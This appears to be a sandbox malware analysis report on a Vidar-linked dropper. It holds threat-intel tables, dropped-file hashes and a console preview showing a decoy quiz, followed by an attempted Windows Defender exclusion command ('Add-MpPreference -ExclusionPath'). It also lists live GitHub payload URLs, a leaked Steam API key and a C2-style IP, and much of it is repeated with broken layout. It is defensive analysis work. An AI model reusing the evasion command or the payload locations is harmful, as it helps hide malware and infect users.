• Successful, ratio: 37.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 237
• Number of non-executed functions: 47
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5308 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5552 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7556 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7684 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8104 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

No simulations
Match            Associated Sample Name / URL                                 Detection  Threat Name  Context
185.199.109.133  cr_asm3.ps1                                                  malicious  Unknown      raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                 gabe.ps1                                                     malicious  Unknown      raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                 5UIy3bo46y.dll                                               malicious  Unknown      raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                 HQsitBLlOv.dll                                               malicious  Unknown      raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                 steamcodegenerator.exe                                       malicious  Unknown      raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                 OSLdZanXNc.exe                                               malicious  Unknown      raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                 steamcodegenerator.exe                                       malicious  Unknown      raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                 SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll   malicious  Metasploit   raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                                                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.valvesoftware.com/legal.htm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.199.110.133
raw.githubusercontent.com | Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | BigProject.exe | malicious | LummaC | 185.199.110.133
raw.githubusercontent.com | Set-up!.exe | malicious | LummaC | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.111.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.108.133
raw.githubusercontent.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.110.133
raw.githubusercontent.com | 58VSNPxrI4.exe | malicious | Unknown | 185.199.108.133
github.com | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | ORDER-241221K6890PF57682456POC7893789097393.j.jar | malicious | Caesium Obfuscator, STRRAT | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 20.233.83.145
github.com | 58VSNPxrI4.exe | malicious | Unknown | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 20.233.83.145
github.com | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT | 20.233.83.145
steamcommunity.com | BVGvbpplT8.exe | malicious | LummaC, Stealc | 104.102.49.254
steamcommunity.com | 613vKYuY2S.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | mgEXk8ip26.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | 44EPDJT1V8.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | Bire1g8ahY.exe | malicious | LummaC, Stealc | 104.102.49.254
steamcommunity.com | jSFUzuYPG9.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | HK8IIasL9i.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | OGBLsboKIF.exe | malicious | LummaC | 23.55.153.106
steamcommunity.com | NfwBtCx5PR.exe | malicious | LummaC | 23.55.153.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FASTLYUS | 7394231845.html | malicious | Unknown | 151.101.2.137
FASTLYUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.199.110.133
FASTLYUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.199.111.133
FASTLYUS | Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 185.199.110.133
FASTLYUS | BigProject.exe | malicious | LummaC | 185.199.110.133
FASTLYUS | Set-up!.exe | malicious | LummaC | 185.199.108.133
FASTLYUS | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.108.133
FASTLYUS | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 185.199.111.133
FASTLYUS | ORDER-241221K6890PF57682456POC7893789097393.j.jar | malicious | Caesium Obfuscator, STRRAT | 199.232.192.209
UNINETAZ | nshmips.elf | malicious | Mirai | 37.27.50.214
UNINETAZ | nshmpsl.elf | malicious | Mirai | 37.27.50.208
UNINETAZ | 7VfKPMdmiX.exe | malicious | Unknown | 37.27.43.98
UNINETAZ | 7VfKPMdmiX.exe | malicious | Unknown | 37.27.43.98
UNINETAZ | sora.m68k.elf | malicious | Mirai | 37.26.35.119
UNINETAZ | powerpc.nn.elf | malicious | Mirai, Okiru | 37.27.238.92
UNINETAZ | PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger | 37.27.123.72
UNINETAZ | exe009.exe | malicious | Emotet | 185.80.172.199
UNINETAZ | PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger | 37.27.123.72
AKAMAI-ASUS | VBHyEN96Pw.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | BVGvbpplT8.exe | malicious | LummaC, Stealc | 104.102.49.254
AKAMAI-ASUS | 613vKYuY2S.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | mgEXk8ip26.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | 44EPDJT1V8.exe | malicious | LummaC | 104.102.49.254
AKAMAI-ASUS | Bire1g8ahY.exe | malicious | LummaC, Stealc | 104.102.49.254
AKAMAI-ASUS | r4xiHKy8aM.exe | malicious | Socks5Systemz | 104.102.49.254
AKAMAI-ASUS | armv4l.elf | malicious | Unknown | 23.222.144.153
AKAMAI-ASUS | loligang.sh4.elf | malicious | Mirai | 104.72.108.202
MICROSOFT-CORP-MSN-AS-BLOCKUS | Client-built.exe | malicious | Quasar | 20.107.53.25
MICROSOFT-CORP-MSN-AS-BLOCKUS | armv6l.elf | malicious | Unknown | 40.112.151.235
MICROSOFT-CORP-MSN-AS-BLOCKUS | gVKsiQIHqe.exe | malicious | Vidar | 204.79.197.219
MICROSOFT-CORP-MSN-AS-BLOCKUS | trZG6pItZj.exe | malicious | Vidar | 204.79.197.219
MICROSOFT-CORP-MSN-AS-BLOCKUS | armv4l.elf | malicious | Unknown | 20.202.12.183
MICROSOFT-CORP-MSN-AS-BLOCKUS | 2.elf | malicious | Unknown |
                                                                                                                                                                                                                  • 20.78.208.111
                                                                                                                                                                                                                  loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 20.208.252.17
                                                                                                                                                                                                                  loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 20.234.251.100
                                                                                                                                                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                  • 21.152.225.5
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
Associated Sample Name: Ttok18.exe
Detection: malicious
Threat Name: Vidar
Process: C:\Users\user\Desktop\YYjRtxS70h.exe
File Type: CSV text
Category: modified
Size (bytes): 1058
Entropy (8bit): 5.356262093008712
Encrypted: false
SSDEEP: 24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
MD5: B2EFBF032531DD2913F648E75696B0FD
SHA1: 3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
SHA-256: 4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
SHA-512: 79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
Process: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
File Type: HTML document, Unicode text, UTF-8 text, with very long lines (3254)
Category: dropped
Size (bytes): 35590
Entropy (8bit): 5.369832259539059
Encrypted: false
SSDEEP: 768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYq:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hP
MD5: 80E06AF58685711A4D852DCFBDA48730
SHA1: ADB0942E39653EE68AAD1104EA5EA77D148192AE
SHA-256: D9EFB253E1E3419D9816EE5A14E21FE906EACFF5516252424F9F0E303174F7E3
SHA-512: F3012CD6CCA4E4BEF26C4E14E91478D2BB2C4A1C0A80AB46507BEBAA0E86DE773A3F22222B74F5E84364934E7EC256D886DD408FBC8EEBBBE65C713DAD20AC2F
Malicious: false
Preview: <!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX
Process: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
File Type: HTML document, Unicode text, UTF-8 text, with very long lines (3254)
Category: dropped
Size (bytes): 35590
Entropy (8bit): 5.36978905129101
Encrypted: false
SSDEEP: 768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJY0:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hd
MD5: FA34047C6889CD0E70A09771C8258CC9
SHA1: 2AB401DF7083BD3861669A3251D096594D6DB209
SHA-256: 8A934547BFF6691C0B043FA8BBFF5874240602690C759D9BE8D8B2DDB4C9C06D
SHA-512: 5E91CD9A339B944BE4ADDD4A896C427AFC0E53BE56AC2B77633B5F0CF27466B6350AE8DD4DEC7219115A29D9AF89E2CA68D38345B5F86D4BB224C7638959E670
Malicious: false
Preview: <!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Preview: @...e...........................................................
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\YYjRtxS70h.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):476160
Entropy (8bit):7.302597587896513
Encrypted:false
SSDEEP:6144:fVpxoBb+6pIE70i+cif0o5HDl5nUnOpvJ3wpUfcx+43+jyQ/D5PvugK/alI1DB4E:6Ii+cni3h3wpUy+5jyqFvlMfQWt
MD5:F453C5F8C736FF8C381E7022CAD85E3E
SHA1:1906C904A33B1910B88F2020A7942776AB7AD54E
SHA-256:36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
SHA-512:B9A64DAA7591029D966D8AC6684C1EB049F6A3F89865FB760E0EBFE57DC300D3F6F50DACE3353E461370655A8D8BF518AC7B176C574F73ECD43713AD9851282F
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                    • Filename: Ttok18.exe, Detection: malicious, Browse
Process: C:\Users\user\Desktop\YYjRtxS70h.exe
File Type: ASCII text, with CRLF, LF line terminators
Category: dropped
Size (bytes): 3609
Entropy (8bit): 5.192441155502346
Encrypted: false
SSDEEP: 48:3ZQAA1+MLLqAMpwwyjDbcwMftic7+3OtZ7+3QlticB+3OtZB+3Qqntic0+3OtZ0I:6AaLcwtjcwM07gY5gqlqncw7
MD5: A5C845B3DE1AD3378885053D5203F23F
SHA1: 86EA93FC86CE6B988CBDF1495156872FC2DAF7E7
SHA-256: E976DFE43359BE19B4C056CB0BA5D777481493AD503360422CA62EC8A8A38E6D
SHA-512: B18DBE6AE71E4B966F52000D8BCF10228C59DAA08CF5A115F2D5DDF780D198E9245BAF206595D6F488CC25FFB7502F61731E216EBE3B100C0F64C5F73F4E8927
Malicious: false
Preview: Guess the word from the list:..1. Clan..2. Ocean..3. Sun..4. Queen..5. Dog..6. Nest..7. Penguin..8. Giraffe..9. River..10. Kite..11. Monkey..12. Tree..13. Banana..14. House..15. Fish..16. Elephant..17. Jungle..18. Apple..19. Car..20. Island..21. Lion..Enter the word: .Time's up! The program will input the word 'Clan'...Folder 'spxzLeEJs' successfully created on C drive....You won a random image:.... |\ \\\\__ o.. |\_/ o \ o .. |_ (( <==> o.. |/ \__+___/.. | / |....What image was generated? (fish, mountain, boat): .Time's up! The program will input the correct answer: fish..Error adding exclusion for C:\spxzLeEJs: Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\spxzLeEJs..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreferenc
File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 0.013532866334979686
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: YYjRtxS70h.exe
File size: 13'793'970 bytes
MD5: 5a59ce92b07de68c0be8fbd7944214e2
SHA1: b0536d674552c3a11a881b154b668af1b5222641
